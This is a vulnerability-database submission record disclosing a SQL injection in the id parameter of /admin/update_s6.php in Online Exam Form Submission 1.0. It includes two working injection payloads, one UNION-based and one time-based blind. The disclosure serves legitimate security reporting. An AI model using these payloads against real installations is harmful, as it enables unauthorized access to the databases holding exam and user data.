| タイトル | Online Exam Form Submission v1.0 /examformsubmission/admin/update_s6.php GET parameter id exists SQL injection vulnerability |
|---|
| 説明 | Online Exam Form Submission v1.0 has SQL injection.
Vulnerability File: /examformsubmission/admin/update_s6.php
GET parameter id exists SQL injection vulnerability.
UNION query.
Payload1: id=1' union all select null,concat(0x717273,0x66676869),null,null-- -
time-based blind.
Payload2: id=1' and (select 1 from (select(sleep(10)))z) and 'k'='k |
|---|
| ソース | ⚠️ https://github.com/Aiiimer/requestCVE/blob/main/SQL.md |
|---|
| ユーザー | HaoL (UID 48003) |
|---|
| 送信 | 2023年06月02日 12:24 (3 年 ago) |
|---|
| モデレーション | 2023年06月02日 14:39 (2 hours later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 230565 [SourceCodester Online Exam Form Submission 1.0 /admin/update_s6.php 識別子 SQLインジェクション] |
|---|
| ポイント | 19 |
|---|